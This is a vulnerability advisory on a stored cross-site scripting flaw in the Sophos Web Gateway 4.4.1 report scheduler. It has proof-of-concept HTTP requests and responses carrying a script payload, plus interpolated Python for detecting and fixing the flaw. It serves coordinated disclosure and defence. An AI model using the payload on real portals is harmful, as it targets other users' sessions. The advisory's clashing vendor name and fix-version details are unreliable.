Sophos Web Gateway 4.4.1 Cross Site Scripting

2018-01-26T00:00:00
ID PACKETSTORM:146115
Type packetstorm
Reporter Matthew Bergin
Modified 2018-01-26T00:00:00

Description

                                        
KL-001-2018-001 : Sophos Web Gateway Persistent Cross Site Scripting Vulnerability  
  
Title: Sophos Web Gateway Persistent Cross Site Scripting Vulnerability  
Advisory ID: KL-001-2018-001  
Publication Date: 2018.01.26  
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-001.txt  
  
  
1. Vulnerability Details  
  
Affected Vendor: Sophos  
Affected Product: Web Gateway  
Affected Version: 4.4.1  
Platform: Embedded Linux  
CWE Classification: CWE-79: Improper Neutralization of Input During Web  
Page Generation, CWE-80: Improper Neutralization of  
Script-Related HTML Tags in a Web Page  
Impact: Arbitrary Code Execution  
Attack vector: HTTP  
  
2. Vulnerability Description  
  
The report scheduler menu within the management portal  
contains a persistent cross site scripting vulnerability. This  
vulnerability can be used to target other users of the same  
portal.  
  
3. Technical Description  
  
A valid session is required to create the report with the  
persistent cross site scripting payload attached. An example  
attack payload has been included below. This payload is designed  
to trigger an alert box with the number one being displayed.  
  
POST /index.php?c=report_scheduler HTTP/1.1  
Host: 1.3.3.7  
Accept-Language: en-US,en;q=0.5  
X-Requested-With: XMLHttpRequest  
X-Prototype-Version: 1.6.1  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Content-Length: 1190  
DNT: 1  
Connection: close  
  
  
action=save&STYLE=016a16896568739c11955632068abddd&data=%5b%7b%22%53%54%59%4c%45%22%3a%20%22%30%31%36%61%31%36%38%39%36%35%36%38%37%33%39%63%31%31%39%35%35%36%33%32%30%36%38%61%62%64%64%64%22%2c%20%22%63%62%5f%74%72%61%66%5f%70%65%72%66%22%3a%20%22%79%65%73%22%2c%20%22%73%62%5f%64%65%74%61%69%6c%65%64%5f%70%6f%6c%69%63%79%5f%63%6f%75%6e%74%22%3a%20%22%31%22%2c%20%22%73%62%5f%67%72%6f%75%70%73%22%3a%20%22%73%6f%70%68%6f%73%5f%73%77%61%5f%61%6c%6c%5f%64%65%70%61%72%74%6d%65%6e%74%73%22%2c%20%22%72%64%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%64%61%69%6c%79%22%2c%20%22%73%62%5f%64%61%79%73%22%3a%20%22%37%22%2c%20%22%73%62%5f%77%65%65%6b%6c%79%5f%64%61%79%22%3a%20%22%4d%6f%6e%64%61%79%22%2c%20%22%74%78%74%5f%73%63%68%65%64%75%6c%65%5f%6e%61%6d%65%22%3a%20%22%74%65%73%74%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3b%3c%2f%73%63%72%69%70%74%3e%22%2c%20%22%63%62%5f%61%63%74%69%76%61%74%65%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%79%65%73%22%2c%20%22%72%65%63%69%70%69%65%6e%74%73%22%3a%20%22%74%65%73%74%40%74%65%73%74%2e%61%73%64%61%73%64%22%2c%20%22%73%63%68%65%64%75%6c%65%5f%69%64%22%3a%20%22%64%47%56%7a%64%41%3d%3d%22%2c%20%22%6f%77%6e%65%72%22%3a%20%22%61%64%6d%69%6e%22%7d%5d  
  
  
HTTP/1.1 200 OK  
Date: Sat, 29 Jul 2017 16:05:25 GMT  
Server: Apache  
Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0  
Pragma: no-cache  
X-Frame-Options: sameorigin  
X-Content-Type-Options: nosniff  
Connection: close  
Content-Type: text/html; charset=utf-8  
Content-Length: 41  
  
{"status":0,"statusMsg":"Settings saved"}  
  
  
The URL-encoded input passed in the data parameter can be  
decoded to an array containing a single JSON buffer.  
  
  
[{"STYLE": "016a16896568739c11955632068abddd", "cb_traf_perf": "yes", "sb_detailed_policy_count": "1",  
"sb_groups": "sophos_swa_all_departments", "rd_schedule": "daily", "sb_days": "7", "sb_weekly_day": "Monday",  
"txt_schedule_name": "test<script>alert(1);</script>", "cb_activate_schedule": "yes", "recipients": "test@test.asdasd",  
"schedule_id": "dGVzdA==", "owner": "admin"}]  
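The decoding step described above, as an added example (not code from the advisory or from Sophos): it parses the form body of a report_scheduler save request, decodes the `data` parameter into its JSON array of records, and lists any field whose value carries HTML-significant characters. The sample body is constructed here by re-encoding the decoded record shown in the advisory; the way the request is split, and the assumption that a schedule name never legitimately needs `<`, `>`, quotes or `&`, are mine and make the last function usable as a simple request-log or WAF check.

```python
import json
import re
from urllib.parse import parse_qs, quote

# Constructed sample: the decoded record from the advisory, re-encoded the same way
# the form post carries it (action=save&STYLE=...&data=<url-encoded JSON array>).
SAMPLE_RECORD = {
    "STYLE": "016a16896568739c11955632068abddd",
    "cb_traf_perf": "yes",
    "sb_detailed_policy_count": "1",
    "sb_groups": "sophos_swa_all_departments",
    "rd_schedule": "daily",
    "sb_days": "7",
    "sb_weekly_day": "Monday",
    "txt_schedule_name": "test<script>alert(1);</script>",
    "cb_activate_schedule": "yes",
    "recipients": "test@test.asdasd",
    "schedule_id": "dGVzdA==",
    "owner": "admin",
}
SAMPLE_BODY = (
    "action=save&STYLE=016a16896568739c11955632068abddd&data="
    + quote(json.dumps([SAMPLE_RECORD]), safe="")
)

# Characters that change meaning in HTML element-text or attribute context (assumption:
# none of them belongs in a report schedule name).
MARKUP_CHARS = re.compile(r"""[<>"'&]""")


def parse_schedule_request(body: str) -> list[dict]:
    """Decode a report_scheduler 'save' body into its list of schedule records.

    Returns [] for any other action (e.g. 'load'); raises ValueError if 'data'
    does not decode to a JSON array of objects.
    """
    fields = parse_qs(body, keep_blank_values=True)
    if fields.get("action", [""])[0] != "save":
        return []
    raw = fields.get("data", [""])[0]          # parse_qs already percent-decodes
    records = json.loads(raw)
    if not isinstance(records, list) or not all(isinstance(r, dict) for r in records):
        raise ValueError("data must be a JSON array of objects")
    return records


def fields_with_markup(record: dict) -> dict[str, str]:
    """Return the string fields of one record whose value contains HTML-significant characters."""
    return {
        key: value
        for key, value in record.items()
        if isinstance(value, str) and MARKUP_CHARS.search(value)
    }


def flag_request(body: str) -> list[tuple[int, str, str]]:
    """Scan one request body; list (record index, field, value) for every suspicious field."""
    findings = []
    for index, record in enumerate(parse_schedule_request(body)):
        for key, value in fields_with_markup(record).items():
            findings.append((index, key, value))
    return findings


if __name__ == "__main__":
    for index, key, value in flag_request(SAMPLE_BODY):
        print(f"record {index}: field {key!r} contains markup: {value!r}")
```

Run against the constructed body, the only field flagged is txt_schedule_name; a load request (no `data` parameter) yields no findings at all.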
  
  
Within the JSON buffer is a key called txt_schedule_name. The  
value for this key is the name of the scheduled report. This  
value is included in the report schedule list.  
  
  
"txt_schedule_name": "test<script>alert(1);</script>"  
  
The HTML tags are then stored. When the report schedule is  
viewed, the resulting JSON is sent with content-type text/html  
instead of application/json, causing the browser to execute any  
unescaped JavaScript it contains. The output is HTML-encoded  
with the exception of the txt_schedule_name value, which is  
not sanitized, so the payload triggers.  
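The rendering defect and its fix, as an added example that is not the product's code: `render_row_vulnerable` mirrors the structure seen in the load response, with the schedule name interpolated raw into an id attribute, a title attribute and element text; `render_row_fixed` HTML-encodes every user-controlled value before it reaches either context; `build_list_response` serves the result under application/json with nosniff rather than text/html. The row markup is simplified (the href is reduced to "#" and the action and delete cells are omitted), the sample values are taken from the advisory's decoded record, and the helper names are my own.

```python
import html
import json
import re

# Constructed sample values, taken from the decoded record in the advisory.
SCHEDULE_NAME = "test<script>alert(1);</script>"
OWNER = "admin"

# Characters that change meaning in HTML context.
MARKUP_CHARS = re.compile(r"""[<>"'&]""")


def render_row_vulnerable(name: str, owner: str) -> str:
    """Reproduce the defect: the name lands raw in an id attribute, a title attribute
    and element text, the three spots seen in the advisory's response."""
    return (
        f'<li class="body schedule-row " id="li_{name}">'
        f'<div class="schedulename"><a href="#" title="{name}">{name}</a></div>'
        f'<div class="owner" title="{owner}">{owner}</div>'
        f"</li>"
    )


def render_row_fixed(name: str, owner: str) -> str:
    """Hardened form: every user-controlled value is HTML-encoded (quotes included)
    before it is placed in attribute or element-text context."""
    safe_name = html.escape(name, quote=True)
    safe_owner = html.escape(owner, quote=True)
    return (
        f'<li class="body schedule-row " id="li_{safe_name}">'
        f'<div class="schedulename"><a href="#" title="{safe_name}">{safe_name}</a></div>'
        f'<div class="owner" title="{safe_owner}">{safe_owner}</div>'
        f"</li>"
    )


def leaks_raw_value(fragment: str, value: str) -> bool:
    """Regression check: True when a value carrying HTML-significant characters
    appears verbatim (unencoded) in the rendered fragment."""
    return MARKUP_CHARS.search(value) is not None and value in fragment


def build_list_response(rows_html: str, schedules: list[dict]) -> tuple[dict, bytes]:
    """Serialize the schedule list the way the endpoint should: a JSON body under
    application/json (not text/html), with nosniff so the browser never sniffs it as a page."""
    payload = {
        "schedulesJS": schedules,
        "schedulesList": f'<ul id="table_entries_list">{rows_html}</ul>',
    }
    body = json.dumps(payload).encode("utf-8")
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
        "Content-Length": str(len(body)),
    }
    return headers, body


if __name__ == "__main__":
    print("vulnerable leaks raw value:", leaks_raw_value(render_row_vulnerable(SCHEDULE_NAME, OWNER), SCHEDULE_NAME))
    print("fixed leaks raw value:     ", leaks_raw_value(render_row_fixed(SCHEDULE_NAME, OWNER), SCHEDULE_NAME))
    headers, body = build_list_response(render_row_fixed(SCHEDULE_NAME, OWNER), [{"txt_schedule_name": SCHEDULE_NAME}])
    print(headers["Content-Type"], body.decode("utf-8"))
```

Note that the JSON values in `schedulesJS` stay unencoded on purpose: JSON serialization is the correct encoding for that channel, and the client must HTML-encode again if it ever writes those values into the DOM. Encoding belongs at the point where a value enters a given context, which is why the fix lives in the row renderer and not in the save handler.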
  
  
POST /index.php?c=report_scheduler HTTP/1.1  
Host: 1.3.3.7  
Accept: text/javascript, text/html, application/xml, text/xml, */*  
Accept-Language: en-US,en;q=0.5  
X-Requested-With: XMLHttpRequest  
X-Prototype-Version: 1.6.1  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Content-Length: 81  
DNT: 1  
Connection: close  
  
action=load&sortKey=name&sortDirection=asc&STYLE=016a16896568739c11955632068abddd  
  
  
HTTP/1.1 200 OK  
Date: Sat, 29 Jul 2017 16:06:38 GMT  
Server: Apache  
Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0  
Pragma: no-cache  
X-Frame-Options: sameorigin  
X-Content-Type-Options: nosniff  
Connection: close  
Content-Type: text/html; charset=utf-8  
Content-Length: 1365  
  
  
{"sortKey":"name","sortDirection":"asc","schedulesJS":[{"STYLE":"016a16896568739c11955632068abddd","cb_traf_perf":"yes","sb_detailed_policy_count":"1","sb_groups":"sophos_swa_all_departments","rd_schedule":"daily","sb_days":"7","sb_weekly_day":"Monday","txt_schedule_name":"test<script>alert(1);<\/script>","cb_activate_schedule":"yes","recipients":"test@test.asdasd","schedule_id":"dGVzdA==","owner":"admin"}],"schedulesList":"<ul  
id=\"table_entries_list\"><li class=\"body schedule-row \" id=\"li_test<script>alert(1);<\/script>\"><div  
class=\"schedulename\"><a href=\"?STYLE=016a16896568739c11955632068abddd#\"  
title=\"test<script>alert(1);<\/script>\">test<script>alert(1);<\/script><\/a><\/div><div  
class=\"owner\" title=\"admin\">admin<\/div><div class=\"schedule_time\" title=\"Daily\">Daily<\/div><div  
title=\"Active\" class=\"schedule-active-on\"><\/div><div class=\"action\"><a  
href=\"?STYLE=016a16896568739c11955632068abddd#\" id=\"on_off_test<script>alert(1);<\/script>\"  
name=\"on_off_test<script>alert(1);<\/script>\" class=\"button small\"><span class=\"buttonLabel small\"  
id=\"on_off_span_test<script>alert(1);<\/script>\">Turn Off<\/span><\/a><\/div><div class=\"delete\"><input  
type=\"checkbox\" id=\"chk_test<script>alert(1);<\/script>\"\/><\/div><\/li><\/ul>"}  
  
4. Mitigation and Remediation Recommendation  
  
The vendor has released version 4.3.3.1 of the Web Gateway  
which addresses this issue. Release notes are available at:  
  
http://wsa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.3.1.html  
  
5. Credit  
  
This vulnerability was discovered by Matt Bergin (@thatguylevel)  
of KoreLogic, Inc.  
  
6. Disclosure Timeline  
  
2017.08.17 - KoreLogic submits vulnerability details to Sophos.  
2017.08.17 - Sophos confirms receipt.  
2017.09.29 - 30 business days have elapsed since the vulnerability  
was reported to Sophos.  
2017.10.17 - KoreLogic requests an update from Sophos.  
2017.10.19 - Sophos informs KoreLogic that they will issue a fix in  
the next maintenance release, scheduled for the end of  
November. Sophos asks KoreLogic to hold disclosure until  
the new version is released.  
2017.10.23 - 45 business days have elapsed since the vulnerability  
was reported to Splunk.  
2017.11.02 - Sophos notifies KoreLogic that the maintenance release  
has gone live.  
2018.01.26 - KoreLogic public disclosure.  
  
7. Proof of Concept  
  
See 3. Technical Description.  
  
  
The contents of this advisory are copyright(c) 2018  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/  
  
KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html  
  
Our public vulnerability disclosure policy is available at:  
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt  
  